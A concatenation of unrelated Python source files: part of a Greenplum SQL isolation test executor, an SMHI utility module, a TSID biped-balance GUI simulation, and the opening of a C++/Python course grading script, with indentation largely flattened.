stripped_command = command.strip()
if stripped_command.endswith(";"):
return stripped_command.replace(";", "")
else:
raise SyntaxError("expected 'include: %s' to end with a semicolon." % stripped_command)
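def _example_parse_include():
    # Hypothetical usage (not part of the original suite): "include: <path>;"
    # lines yield the path without the trailing semicolon.
    assert parse_include_statement("include: helpers/setup.sql;") == "helpers/setup.sql"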
class SQLIsolationExecutor(object):
def __init__(self, dbname=''):
self.processes = {}
# The re.S flag makes the "." in the regex match newlines.
# When matched against a command in process_command(), all
# lines in the command are matched and sent as SQL query.
self.command_pattern = re.compile(r"^(-?\d+|[*])([&\\<\\>UIq]*?)\:(.*)", re.S)
if dbname:
self.dbname = dbname
else:
self.dbname = os.environ.get('PGDATABASE')
class SQLConnection(object):
def __init__(self, out_file, name, utility_mode, dbname):
self.name = name
self.utility_mode = utility_mode
self.out_file = out_file
self.dbname = dbname
parent_conn, child_conn = multiprocessing.Pipe(True)
self.p = multiprocessing.Process(target=self.session_process, args=(child_conn,))
self.pipe = parent_conn
self.has_open = False
self.p.start()
# Close "our" copy of the child's handle, so that if the child dies,
# recv() on the pipe will fail.
            child_conn.close()
self.out_file = out_file
def session_process(self, pipe):
sp = SQLIsolationExecutor.SQLSessionProcess(self.name,
self.utility_mode, pipe, self.dbname)
sp.do()
def query(self, command):
print >>self.out_file
self.out_file.flush()
if len(command.strip()) == 0:
return
if self.has_open:
raise Exception("Cannot query command while waiting for results")
self.pipe.send((command, False))
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.rstrip()
def fork(self, command, blocking):
print >>self.out_file, " <waiting ...>"
self.pipe.send((command, True))
if blocking:
time.sleep(0.5)
if self.pipe.poll(0):
p = self.pipe.recv()
raise Exception("Forked command is not blocking; got output: %s" % p.strip())
self.has_open = True
def join(self):
r = None
print >>self.out_file, " <... completed>"
if self.has_open:
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.rstrip()
self.has_open = False
def stop(self):
self.pipe.send(("", False))
self.p.join()
if self.has_open:
raise Exception("Should not finish test case while waiting for results")
def quit(self):
print >>self.out_file, "... <quitting>"
self.stop()
def terminate(self):
self.pipe.close()
self.p.terminate()
class SQLSessionProcess(object):
def __init__(self, name, utility_mode, pipe, dbname):
"""
Constructor
"""
self.name = name
self.utility_mode = utility_mode
self.pipe = pipe
self.dbname = dbname
if self.utility_mode:
(hostname, port) = self.get_utility_mode_port(name)
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_session_role=utility")
else:
self.con = self.connectdb(self.dbname)
def connectdb(self, given_dbname, given_host = None, given_port = None, given_opt = None):
con = None
retry = 1000
while retry:
try:
if (given_port is None):
con = pygresql.pg.connect(host= given_host,
opt= given_opt,
dbname= given_dbname)
else:
con = pygresql.pg.connect(host= given_host,
port= given_port,
opt= given_opt,
dbname= given_dbname)
break
except Exception as e:
if (("the database system is starting up" in str(e) or
"the database system is in recovery mode" in str(e)) and
retry > 1):
retry -= 1
time.sleep(0.1)
else:
raise
return con
def get_utility_mode_port(self, name):
"""
        Gets the (hostname, port) combination for the segment with
        content id = name and role = 'p' (primary)
"""
con = self.connectdb(self.dbname)
r = con.query("SELECT hostname, port FROM gp_segment_configuration WHERE content = %s and role = 'p'" % name).getresult()
if len(r) == 0:
raise Exception("Invalid content %s" % name)
if r[0][0] == socket.gethostname():
return (None, int(r[0][1]))
return (r[0][0], int(r[0][1]))
# Print out a pygresql result set (a Query object, after the query
# has been executed), in a format that imitates the default
# formatting of psql. This isn't a perfect imitation: we left-justify
# all the fields and headers, whereas psql centers the header, and
# right-justifies numeric fields. But this is close enough, to make
# gpdiff.pl recognize the result sets as such. (We used to just call
# str(r), and let PyGreSQL do the formatting. But even though
# PyGreSQL's default formatting is close to psql's, it's not close
# enough.)
def printout_result(self, r):
widths = []
# Figure out the widths of each column.
fields = r.listfields()
for f in fields:
widths.append(len(str(f)))
rset = r.getresult()
for row in rset:
colno = 0
for col in row:
if col is None:
col = ""
widths[colno] = max(widths[colno], len(str(col)))
colno = colno + 1
# Start printing. Header first.
result = ""
colno = 0
for f in fields:
if colno > 0:
result += "|"
result += " " + f.ljust(widths[colno]) + " "
colno = colno + 1
result += "\n"
# Then the bar ("----+----")
colno = 0
for f in fields:
if colno > 0:
result += "+"
result += "".ljust(widths[colno] + 2, "-")
colno = colno + 1
result += "\n"
# Then the result set itself
for row in rset:
colno = 0
for col in row:
if colno > 0:
result += "|"
if col is None:
col = ""
result += " " + str(col).ljust(widths[colno]) + " "
colno = colno + 1
result += "\n"
# Finally, the row count
if len(rset) == 1:
result += "(1 row)\n"
else:
result += "(" + str(len(rset)) +" rows)\n"
return result
def execute_command(self, command):
"""
Executes a given command
"""
try:
r = self.con.query(command)
if r and type(r) == str:
echo_content = command[:-1].partition(" ")[0].upper()
return "%s %s" % (echo_content, r)
elif r:
return self.printout_result(r)
else:
echo_content = command[:-1].partition(" ")[0].upper()
return echo_content
except Exception as e:
return str(e)
def do(self):
"""
Process loop.
Ends when the command None is received
"""
(c, wait) = self.pipe.recv()
while c:
if wait:
time.sleep(0.1)
r = self.execute_command(c)
self.pipe.send(r)
r = None
(c, wait) = self.pipe.recv()
def get_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Gets or creates the process by the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
if not dbname:
dbname = self.dbname
self.processes[(name, utility_mode)] = SQLIsolationExecutor.SQLConnection(out_file, name, utility_mode, dbname)
return self.processes[(name, utility_mode)]
def quit_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Quits a process with the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
raise Exception("Sessions not started cannot be quit")
self.processes[(name, utility_mode)].quit()
del self.processes[(name, utility_mode)]
def get_all_primary_contentids(self, dbname):
"""
Retrieves all primary content IDs (including the master). Intended for
use by *U queries.
"""
if not dbname:
dbname = self.dbname
con = pygresql.pg.connect(dbname=dbname)
result = con.query("SELECT content FROM gp_segment_configuration WHERE role = 'p'").getresult()
if len(result) == 0:
raise Exception("Invalid gp_segment_configuration contents")
return [int(content[0]) for content in result]
def process_command(self, command, output_file):
"""
Processes the given command.
The command at this point still includes the isolation behavior
flags, e.g. which session to use.
"""
process_name = ""
sql = command
flag = ""
dbname = ""
m = self.command_pattern.match(command)
if m:
process_name = m.groups()[0]
flag = m.groups()[1]
sql = m.groups()[2]
sql = sql.lstrip()
            # If db_name is specified, it should be of the following syntax:
# 1:@db_name <db_name>: <sql>
if sql.startswith('@db_name'):
sql_parts = sql.split(':', 2)
if not len(sql_parts) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not sql_parts[0].startswith('@db_name'):
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not len(sql_parts[0].split()) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
dbname = sql_parts[0].split()[1].strip()
if not dbname:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
sql = sql_parts[1]
if not flag:
if sql.startswith('!'):
sql = sql[1:]
# Check for execution mode. E.g.
# !\retcode path/to/executable --option1 --option2 ...
#
# At the moment, we only recognize the \retcode mode, which
# ignores all program output in the diff (it's still printed)
# and adds the return code.
mode = None
if sql.startswith('\\'):
mode, sql = sql.split(None, 1)
if mode != '\\retcode':
raise Exception('Invalid execution mode: {}'.format(mode))
cmd_output = subprocess.Popen(sql.strip(), stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
stdout, _ = cmd_output.communicate()
print >> output_file
if mode == '\\retcode':
print >> output_file, '-- start_ignore'
print >> output_file, stdout
if mode == '\\retcode':
print >> output_file, '-- end_ignore'
print >> output_file, '(exited with code {})'.format(cmd_output.returncode)
elif sql.startswith('include:'):
helper_file = parse_include_statement(sql)
self.get_process(
output_file,
process_name,
dbname=dbname
).query(
load_helper_file(helper_file)
)
else:
self.get_process(output_file, process_name, dbname=dbname).query(sql.strip())
elif flag == "&":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), True)
elif flag == ">":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), False)
elif flag == "<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, dbname=dbname).join()
elif flag == "q":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, dbname=dbname)
elif flag == "U":
if process_name == '*':
process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
else:
process_names = [process_name]
for name in process_names:
self.get_process(output_file, name, utility_mode=True, dbname=dbname).query(sql.strip())
elif flag == "U&":
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).fork(sql.strip(), True)
elif flag == "U<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).join()
elif flag == "Uq":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, utility_mode=True, dbname=dbname)
else:
raise Exception("Invalid isolation flag")
def process_isolation_file(self, sql_file, output_file):
"""
Processes the given sql file and writes the output
to output file
"""
try:
command = ""
for line in sql_file:
#tinctest.logger.info("re.match: %s" %re.match(r"^\d+[q\\<]:$", line))
print >>output_file, line.strip(),
if line[0] == "!":
command_part = line # shell commands can use -- for multichar options like --include
else:
command_part = line.partition("--")[0] # remove comment from line
if command_part == "" or command_part == "\n":
print >>output_file
elif command_part.endswith(";\n") or re.match(r"^\d+[q\\<]:$", line) or re.match(r"^-?\d+U[q\\<]:$", line):
command += command_part
try:
self.process_command(command, output_file)
except Exception as e:
print >>output_file, "FAILED: ", e
command = ""
else:
command += command_part
for process in self.processes.values():
process.stop()
except:
for process in self.processes.values():
process.terminate()
raise
finally:
for process in self.processes.values():
process.terminate()
class SQLIsolationTestCase:
"""
The isolation test case allows a fine grained control of interleaved
executing transactions. This is mainly used to test isolation behavior.
[<#>[flag]:] <sql> | ! <shell scripts or command>
#: either an integer indicating a unique session, or a content-id if
followed by U (for utility-mode connections). In 'U' mode, the
content-id can alternatively be an asterisk '*' to perform a
utility-mode query on the master and all primaries.
flag:
&: expect blocking behavior
>: running in background without blocking
<: join an existing session
q: quit the given session
U: connect in utility mode to primary contentid from gp_segment_configuration
U&: expect blocking behavior in utility mode (does not currently support an asterisk target)
U<: join an existing utility mode session (does not currently support an asterisk target)
I: include a file of sql statements (useful for loading reusable functions)
An example is:
Execute BEGIN in transaction 1
Execute BEGIN in transaction 2
Execute INSERT in transaction 2
Execute SELECT in transaction 1
Execute COMMIT in transaction 2
Execute SELECT in transaction 1
The isolation tests are specified identical to sql-scripts in normal
SQLTestCases. However, it is possible to prefix a SQL line with
    a transaction identifier followed by a colon (":").
The above example would be defined by
1: BEGIN;
2: BEGIN;
2: INSERT INTO a VALUES (1);
1: SELECT * FROM a;
2: COMMIT;
1: SELECT * FROM a;
Blocking behavior can be tested by forking and joining.
1: BEGIN;
2: BEGIN;
1: DELETE FROM foo WHERE a = 4;
2&: DELETE FROM foo WHERE a = 4;
1: COMMIT;
2<:
2: COMMIT;
2& forks the command. It is executed in the background. If the
command is NOT blocking at this point, it is considered an error.
2< joins the background command and outputs the result of the
command execution.
Session ids should be smaller than 1024.
2U: Executes a utility command connected to port 40000.
    One difference from SQLTestCase is the output of INSERT.
SQLTestCase would output "INSERT 0 1" if one tuple is inserted.
SQLIsolationTestCase would output "INSERT 1". As the
SQLIsolationTestCase needs to have a more fine-grained control
over the execution order than possible with PSQL, it uses
the pygresql python library instead.
Connecting to a specific database:
1. If you specify a db_name metadata in the sql file, connect to that database in all open sessions.
2. If you want a specific session to be connected to a specific database , specify the sql as follows:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
etc
    Here session 1 will be connected to testdb and session 2 will be connected to test2db. You can specify @db_name only at the beginning of the session. For example, the following would error out:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: @db_name testdb: <sql>
2: <sql>
etc
Quitting sessions:
By default, all opened sessions will be stopped only at the end of the sql file execution. If you want to explicitly quit a session
    in the middle of the test execution, you can specify a flag 'q' with the session identifier. For example:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
1q:
2: <sql>
3: <sql>
2q:
3: <sql>
2: @db_name test: <sql>
1q: ---> Will quit the session established with testdb.
2q: ---> Will quit the session established with test2db.
The subsequent 2: @db_name test: <sql> will open a new session with the database test and execute the sql against that session.
Catalog Modification:
Some tests are easier to write if it's possible to modify a system
catalog across the *entire* cluster. To perform a utility-mode query on
all segments and the master, you can use *U commands:
*U: SET allow_system_table_mods = true;
*U: UPDATE pg_catalog.<table> SET <column> = <value> WHERE <cond>;
Since the number of query results returned by a *U command depends on
the developer's cluster configuration, it can be useful to wrap them in
a start_/end_ignore block. (Unfortunately, this also hides legitimate
failures; a better long-term solution is needed.)
Block/join flags are not currently supported with *U.
Including files:
-- example contents for file.sql: create function some_test_function() returning void ...
include: path/to/some/file.sql;
select some_helper_function();
"""
def run_sql_file(self, sql_file, out_file = None, out_dir = None, optimizer = None):
"""
        Given a sql file and an ans file, this adds the specified gucs (self.gucs) to the sql file, runs the sql
against the test case database (self.db_name) and verifies the output with the ans file.
If an 'init_file' exists in the same location as the sql_file, this will be used
while doing gpdiff.
"""
# Add gucs to the test sql and form the actual sql file to be run
if not out_dir:
out_dir = self.get_out_dir()
if not os.path.exists(out_dir):
TINCSystem.make_dirs(out_dir, ignore_exists_error = True)
if optimizer is None:
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file))
else:
# sql file will be <basename>_opt.sql or <basename>_planner.sql based on optimizer
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file).replace('.sql', '_%s.sql' %self._optimizer_suffix(optimizer)))
self._add_gucs_to_sql_file(sql_file, gucs_sql_file, optimizer)
self.test_artifacts.append(gucs_sql_file)
if not out_file:
if optimizer is None:
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '.out'))
else:
# out file will be *_opt.out or *_planner.out based on optimizer
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_%s.out' %self._optimizer_suffix(optimizer)))
self.test_artifacts.append(out_file)
executor = SQLIsolationExecutor(dbname=self.db_name)
with open(out_file, "w") as f:
executor.process_isolation_file(open(sql_file), f)
f.flush()
if out_file[-2:] == '.t':
out_file = out_file[:-2]
return out_file
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("--dbname", dest="dbname",
help="connect to database DBNAME", metavar="DBNAME")
(options, args) = parser.parse_args()
executor = SQLIsolationExecutor(dbname=options.dbname)
executor.process_isolation_file(sys.stdin, sys.stdout)
|
utils.py
|
#!/usr/bin/env python
# Copyright (c) 2022 SMHI, Swedish Meteorological and Hydrological Institute.
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
"""
Created on 2022-02-02 18:00
@author: johannes
"""
import numpy as np
from pathlib import Path
from collections.abc import Mapping
from threading import Thread
from decimal import Decimal, ROUND_HALF_UP
def round_value(value: (str, int, float), nr_decimals=2) -> str:
"""Calculate rounded value."""
return str(Decimal(str(value)).quantize(
Decimal('%%1.%sf' % nr_decimals % 1),
rounding=ROUND_HALF_UP)
)
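def _example_round_value():
    # Hypothetical check (not part of the original module): building the
    # Decimal from str(value) plus ROUND_HALF_UP avoids binary-float
    # surprises; the builtin round(2.675, 2) yields 2.67 instead.
    assert round_value(2.675) == '2.68'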
def decmin_to_decdeg(pos, decimals=4):
"""Convert degrees and decimal minutes into decimal degrees."""
pos = float(pos)
output = np.floor(pos / 100.) + (pos % 100) / 60.
return round_value(output, nr_decimals=decimals)
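def _example_decmin_to_decdeg():
    # Hypothetical check (not part of the original module): 5730.6 reads as
    # 57 degrees 30.6 decimal minutes, and 57 + 30.6/60 = 57.51.
    assert decmin_to_decdeg(5730.6) == '57.5100'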
def get_base_folder():
"""Return the base folder of ODV-transformer."""
return Path(__file__).parent
def recursive_dict_update(d: dict, u: dict) -> dict:
"""Recursive dictionary update.
Copied from:
http://stackoverflow.com/questions/3232943/update-
value-of-a-nested-dictionary-of-varying-depth
via satpy
"""
for k, v in u.items():
if isinstance(v, Mapping):
r = recursive_dict_update(d.get(k, {}), v)
d[k] = r
else:
d[k] = u[k]
return d
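def _example_recursive_update():
    # Hypothetical check (not part of the original module): nested keys are
    # merged rather than overwritten wholesale.
    merged = recursive_dict_update({'a': {'x': 1}}, {'a': {'y': 2}, 'b': 3})
    assert merged == {'a': {'x': 1, 'y': 2}, 'b': 3}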
def thread_process(call_function, *args, **kwargs):
"""Thread process.
Args:
call_function: function to use
args: Arguments to call_function
kwargs: Key word arguments to call_function
"""
Thread(target=call_function, args=args, kwargs=kwargs).start()
|
ex_3_biped_balance_with_gui.py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 17 22:31:22 2019
@author: student
"""
import numpy as np
import pinocchio as pin
import tkinter as tk
from tkinter import Scale, Button, Frame, Entry, Label, Tk, mainloop, HORIZONTAL
import threading
class Scale3d:
def __init__(self, master, name, from_, to, tickinterval, length, orient, command):
self.s = 3*[None]
axes = ['X','Y','Z']
for i in range(3):
self.s[i] = Scale(master, label=name+' '+axes[i], from_=from_[i], to=to[i],
tickinterval=tickinterval[i], orient=orient[i], length=length[i], command=command)
self.s[i].pack()
separator = Frame(height=2, bd=1, relief=tk.SUNKEN)
separator.pack(fill=tk.X, padx=5, pady=5)
def get(self):
return self.s[0].get(), self.s[1].get(), self.s[2].get()
class Entry3d:
def __init__(self, master, name):
self.s = 3*[None]
axes = ['X','Y','Z']
for i in range(3):
Label(master, text=name+" "+axes[i]).pack() #side=tk.TOP)
self.s[i] = Entry(master, width=5)
self.s[i].pack() #side=tk.BOTTOM)
separator = Frame(height=1, bd=1, relief=tk.SUNKEN)
separator.pack(fill=tk.X, padx=2, pady=2) #, side=tk.BOTTOM)
def get(self):
try:
return [float(self.s[i].get()) for i in range(3)]
        except ValueError:
print("could not convert string to float", [self.s[i].get() for i in range(3)])
return 3*[0.0]
scale_com, scale_RF, scale_LF = None, None, None
button_contact_RF, button_contact_LF = None, None
push_robot_active, push_robot_com_vel, com_vel_entry = False, 3*[0.0], None
def update_com_ref_scale(value):
x, y, z = scale_com.get()
tsid.trajCom.setReference(com_0 + np.array([1e-2*x, 1e-2*y, 1e-2*z]).T)
def update_RF_ref_scale(value):
x, y, z = scale_RF.get()
H_rf_ref = H_rf_0.copy()
    H_rf_ref.translation += np.array([1e-2*x, 1e-2*y, 1e-2*z]).T
tsid.trajRF.setReference(H_rf_ref)
def update_LF_ref_scale(value):
x, y, z = scale_LF.get()
H_lf_ref = H_lf_0.copy()
    H_lf_ref.translation += np.array([1e-2*x, 1e-2*y, 1e-2*z]).T
tsid.trajLF.setReference(H_lf_ref)
def switch_contact_RF():
if(tsid.contact_RF_active):
tsid.remove_contact_RF()
button_contact_RF.config(text='Make contact right foot')
else:
tsid.add_contact_RF()
button_contact_RF.config(text='Break contact right foot')
def switch_contact_LF():
if(tsid.contact_LF_active):
tsid.remove_contact_LF()
button_contact_LF.config(text='Make contact left foot')
else:
tsid.add_contact_LF()
button_contact_LF.config(text='Break contact left foot')
def toggle_wireframe_mode():
tsid.gui.setWireFrameMode('world', 'WIREFRAME')
def push_robot():
global push_robot_com_vel, push_robot_active
push_robot_com_vel = com_vel_entry.get()
push_robot_active = True
def create_gui():
"""thread worker function"""
global scale_com, scale_RF, scale_LF, button_contact_RF, button_contact_LF, com_vel_entry
master = Tk(className='TSID GUI')
scale_com = Scale3d(master, 'CoM', [-10,-15,-40], [10,15,40], [5,5,10], [200,250,300],
3*[HORIZONTAL], update_com_ref_scale)
scale_RF = Scale3d(master, 'Right foot', 3*[-30], 3*[30], 3*[10], 3*[300],
3*[HORIZONTAL], update_RF_ref_scale)
scale_LF = Scale3d(master, 'Left foot', 3*[-30], 3*[30], 3*[10], 3*[300],
3*[HORIZONTAL], update_LF_ref_scale)
button_contact_RF = Button(master, text='Break contact right foot', command=switch_contact_RF)
button_contact_RF.pack(side=tk.LEFT)
button_contact_LF = Button(master, text='Break contact left foot', command=switch_contact_LF)
button_contact_LF.pack(side=tk.LEFT)
Button(master, text='Toggle wireframe', command=toggle_wireframe_mode).pack(side=tk.LEFT)
# Frame(height=2, bd=1, relief=tk.SUNKEN).pack(fill=tk.X, padx=5, pady=5)
Button(master, text='Push robot CoM', command=push_robot).pack()
com_vel_entry = Entry3d(master, 'CoM vel')
mainloop()
return
import time
import romeo_conf as conf
from tsid_biped import TsidBiped
def run_simu():
global push_robot_active
i, t = 0, 0.0
q, v = tsid.q, tsid.v
time_avg = 0.0
while True:
time_start = time.time()
tsid.comTask.setReference(tsid.trajCom.computeNext())
tsid.postureTask.setReference(tsid.trajPosture.computeNext())
tsid.rightFootTask.setReference(tsid.trajRF.computeNext())
tsid.leftFootTask.setReference(tsid.trajLF.computeNext())
HQPData = tsid.formulation.computeProblemData(t, q, v)
sol = tsid.solver.solve(HQPData)
if(sol.status!=0):
print("QP problem could not be solved! Error code:", sol.status)
break
# tau = tsid.formulation.getActuatorForces(sol)
dv = tsid.formulation.getAccelerations(sol)
q, v = tsid.integrate_dv(q, v, dv, conf.dt)
i, t = i+1, t+conf.dt
if(push_robot_active):
push_robot_active = False
data = tsid.formulation.data()
if(tsid.contact_LF_active):
J_LF = tsid.contactLF.computeMotionTask(0.0, q, v, data).matrix
else:
J_LF = np.zeros((0,tsid.model.nv))
if(tsid.contact_RF_active):
J_RF = tsid.contactRF.computeMotionTask(0.0, q, v, data).matrix
else:
J_RF = np.zeros((0,tsid.model.nv))
J = np.vstack((J_LF, J_RF))
J_com = tsid.comTask.compute(t, q, v, data).matrix
A = np.vstack((J_com, J))
b = np.vstack((np.array(push_robot_com_vel).T, np.zeros((J.shape[0],1))))
v = np.linalg.lstsq(A, b, rcond=-1)[0]
if i%conf.DISPLAY_N == 0:
tsid.robot_display.display(q)
x_com = tsid.robot.com(tsid.formulation.data())
x_com_ref = tsid.trajCom.getSample(t).pos()
H_lf = tsid.robot.position(tsid.formulation.data(), tsid.LF)
H_rf = tsid.robot.position(tsid.formulation.data(), tsid.RF)
x_lf_ref = tsid.trajLF.getSample(t).pos()[:3]
x_rf_ref = tsid.trajRF.getSample(t).pos()[:3]
tsid.gui.applyConfiguration('world/com', x_com.tolist()+[0,0,0,1.])
tsid.gui.applyConfiguration('world/com_ref', x_com_ref.tolist()+[0,0,0,1.])
tsid.gui.applyConfiguration('world/rf', pin.SE3ToXYZQUATtuple(H_rf))
tsid.gui.applyConfiguration('world/lf', pin.SE3ToXYZQUATtuple(H_lf))
tsid.gui.applyConfiguration('world/rf_ref', x_rf_ref.tolist()+[0,0,0,1.])
tsid.gui.applyConfiguration('world/lf_ref', x_lf_ref.tolist()+[0,0,0,1.])
if i%1000==0:
print("Average loop time: %.1f (expected is %.1f)"%(1e3*time_avg, 1e3*conf.dt))
time_spent = time.time() - time_start
time_avg = (i*time_avg + time_spent) / (i+1)
if(time_avg < 0.9*conf.dt): time.sleep(conf.dt-time_avg)
print("".center(conf.LINE_WIDTH,'#'))
print(" Test Task Space Inverse Dynamics ".center(conf.LINE_WIDTH, '#'))
print("".center(conf.LINE_WIDTH,'#'), '\n')
tsid = TsidBiped(conf)
com_0 = tsid.robot.com(tsid.formulation.data())
H_rf_0 = tsid.robot.position(tsid.formulation.data(), tsid.model.getJointId(conf.rf_frame_name))
H_lf_0 = tsid.robot.position(tsid.formulation.data(), tsid.model.getJointId(conf.lf_frame_name))
tsid.gui.addSphere('world/com', conf.SPHERE_RADIUS, conf.COM_SPHERE_COLOR)
tsid.gui.addSphere('world/com_ref', conf.REF_SPHERE_RADIUS, conf.COM_REF_SPHERE_COLOR)
tsid.gui.addSphere('world/rf', conf.SPHERE_RADIUS, conf.RF_SPHERE_COLOR)
tsid.gui.addSphere('world/rf_ref', conf.REF_SPHERE_RADIUS, conf.RF_REF_SPHERE_COLOR)
tsid.gui.addSphere('world/lf', conf.SPHERE_RADIUS, conf.LF_SPHERE_COLOR)
tsid.gui.addSphere('world/lf_ref', conf.REF_SPHERE_RADIUS, conf.LF_REF_SPHERE_COLOR)
th_gui = threading.Thread(target=create_gui)
th_gui.start()
th_simu = threading.Thread(target=run_simu)
th_simu.start()
|
curl_grading.py
|
"""curl_grading.py: tools for analyzing and checking C++ and Py programs"""
import subprocess as sub
import difflib
import unittest
import re
import tokenize
import dis
import io
import cpplint
import sys
import pycodestyle
import logging
import os
import random
import importlib
import multiprocessing
from io import StringIO
import time
from subprocess import PIPE,Popen,run,TimeoutExpired
import json
DEBUG = False
# 1.1 incorporate new checker from fall 2020
# 1.2 fix style point handling
# 1.3 fix Penalty, and allows argv[]
# 1.4 update compile return
# 2.0 switch to Points/MaxPoints to allow for more partial points
# 2.1 move testorder functionality in to setupClass
# 2.2 some format improvements in grade reporting
# 2.3 case sensitive check for file systems.
# 2.4 allow for no Penalty in testcase
# 2.5 improved case text handling
# 2.6 add self.authors
# 3.0 rename curl_grading.py
# 3.1 improve the bracket counting
VERSION = (3, 1)
path = os.environ['PATH']
if path.startswith(".:") or path.endswith(":.") or ":.:" in path:
pass # path ok
else:
print("""Your path is not set correctly. The checker will not work
unless you add "." the current working directory to your PATH.
You can do this by editing ~/.zshrc
""",file=sys.stderr)
sys.exit(42)
class TimeoutException(Exception):
pass
class RunableProcessing(multiprocessing.Process):
def __init__(self, func, *args, **kwargs):
self.queue = multiprocessing.Queue(maxsize=1)
args = (func,) + args
multiprocessing.Process.__init__(self, target=self.run_func, args=args, kwargs=kwargs)
def run_func(self, func, *args, **kwargs):
try:
result = func(*args, **kwargs)
self.queue.put((True, result))
except Exception as e:
self.queue.put((False, e))
def done(self):
return self.queue.full()
def result(self):
return self.queue.get()
def timeout(seconds, force_kill=True):
def wrapper(function):
def inner(*args, **kwargs):
now = time.time()
proc = RunableProcessing(function, *args, **kwargs)
proc.start()
proc.join(seconds)
if proc.is_alive():
if force_kill:
proc.terminate()
runtime = int(time.time() - now)
raise TimeoutException('timed out after {0} seconds'.format(runtime))
assert proc.done()
success, result = proc.result()
if success:
return result
else:
raise result
return inner
return wrapper
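# Hypothetical usage of the decorator above (not part of the grader): the
# wrapped callable runs in a separate process and TimeoutException is raised
# if it does not finish within the budget. Like the grader itself, this
# assumes a platform where the target function can be handed to
# multiprocessing (e.g. a fork-based start method).
@timeout(2)
def _example_slow_op():
    time.sleep(5)  # calling _example_slow_op() raises TimeoutException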
STDLINT = ['-readability/alt_tokens',"+build/include_alpha"]
ignore_lint = [x[1:] for x in STDLINT if x.startswith('-')]
ASTYLE_OPTIONS = [
'--style=google', '--indent=spaces=2', '--formatted', '--dry-run'
]
COMMENT_STRING = {'py': '#', 'sh': "#", 'cpp': '//'}
#CPP_CODE_ONLY = [
# 'g++', '-std=c++14', '-P', '-x', 'c++', '-dD', '-E', '-fpreprocessed'
#]
def silent_import(fname, q):
s = StringIO()
sys.stdout = s
themod = None
try:
themod = importlib.import_module(fname)
except Exception as e:
q.put("fail")
return
q.put("success")
def my_import(modname, code):
filename = modname+".py"
with open(filename,'w') as f:
f.write(code)
q = multiprocessing.Queue()
T = multiprocessing.Process(target=silent_import,args=(modname, q))
T.start()
try:
result = q.get(True,1)
except Exception as e:
        T.terminate()  # import hung or crashed; kill the helper process
        T.join(0.1)
return False
if result=="success":
return importlib.import_module(modname)
return False
def safe_remove(filename):
try:
os.remove(filename)
except Exception as e:
print(e)
def numbers_only(word_lines):
rr=[]
for v in word_lines:
g=v.split()
nums=[]
for x in g:
try:
nums.append(int(x))
except:
try:
nums.append(float(x))
except:
pass
rr.append(nums)
return rr
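def _example_numbers_only():
    # Hypothetical check (not part of the grader): non-numeric tokens are
    # dropped; ints are preferred over floats.
    assert numbers_only(["a 1 2.5 b", "3"]) == [[1, 2.5], [3]]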
bracket_msg="""It is recommended to avoid the use of brackets in C++, i.e., these [ ] or these <: :>
a) Use .at() or other methods instead
b) replace c-style arrays with vectors or strings etc
c) if you must use a c-style array (e.g. argv) use pointers
You have {} brackets.
"""
report_msg="""
===============================
Checking {course} {prog}.
{version}
================================
Information
-----------
{info}
Passed Tests
------------
{passed}
Failed Tests
------------
{failed}
Grading
-------
{grade}"""
AUTHWARN = "WARNING, NO VALID AUTHOR LINES FOUND"
def setup_py(cls, prefix):
with open(cls.realfilename) as f:
cls.file_contents=f.read()
cls.module_name = prefix+str(random.randint(1000,100000))
cls.module_tested = my_import(cls.module_name, cls.file_contents)
if not cls.module_tested:
safe_remove(cls.module_name+".py")
raise unittest.SkipTest(f'During test of {cls.__doc__}, unable to import your module. Timeout or error')
def compile_main(cls,prefix):
if not hasattr(cls,'lintoptions'):
cls.lintoptions = STDLINT
try:
with open(cls.realfilename) as f:
cls.file_contents=f.read()
except:
raise unittest.SkipTest(f"in compile_main, {cls.realfilename} not found.")
cls.executable = prefix+str(random.randint(1000,100000))
cls.new_source_file_main = cls.executable + ".cpp"
with open(cls.new_source_file_main,'w') as f:
f.write(cls.file_contents_main)
try:
T = sub.run(["g++","-std=c++17",'-Wall','-Wno-sign-compare',
cls.new_source_file_main,"-o",cls.executable],
stderr=sub.PIPE,universal_newlines=True)
except Exception as e:
        cls.executable = None
raise unittest.SkipTest("Compile failed.\n"+str(e))
finally:
os.remove(cls.new_source_file_main)
